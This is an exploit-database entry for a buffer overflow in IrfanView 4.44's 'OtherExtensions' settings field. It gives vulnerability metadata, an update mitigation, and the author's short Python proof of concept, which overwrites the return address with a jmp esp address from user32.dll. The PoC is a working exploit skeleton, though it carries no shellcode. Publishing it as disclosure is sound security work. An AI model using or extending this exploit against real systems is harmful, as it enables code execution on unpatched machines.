Irfanview - OtherExtensions Input Overflow

vendor:

Irfanview

by:

Dreivan Orprecio

7,8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Irfanview

Affected Version From: 4.44

Affected Version To: 4.44

Patch Exists: YES

Related CWE: N/A

CPE: a:irfan_skiljan:irfanview:4.44

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2017

Irfanview – OtherExtensions Input Overflow

Irfanview is vulnerable to buffer overflow in the 'OtherExtensions' input field. Debugging was done on a WinXP Pro SP3 (32bit) machine. The exploit author provided a proof of concept code which includes a jump to the stack pointer from user32.dll. The exploit is limited by the presence of bad characters and only 43 bytes of space to host a shellcode.

Mitigation:

Update to the latest version of Irfanview.

Source

Exploit-DB raw data:

# Exploit Title: Irfanview - OtherExtensions Input Overflow
# Date: 29-04-2017
# Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button
# Exploit Author: Dreivan Orprecio
#Version: Irfanview 4.44
#Irfanview is vulnerable to overflow in "OtherExtensions" input field
#Debugging Machine: WinXP Pro SP3 (32bit)


#POC

#!usr/bin/python


      eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll



      buffer = "OtherExtensions="+"A" *  199 + eip + "\xcc" 

      print buffer              #a) irfanview->Option->Properties/Settings->Extensions
                                #b) Paste the buffer in the "other" input then press ok, repeat a) and b)





#badcharacters: those instruction that start with 6,7,8,E,F 
#Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit
#Any other way around this?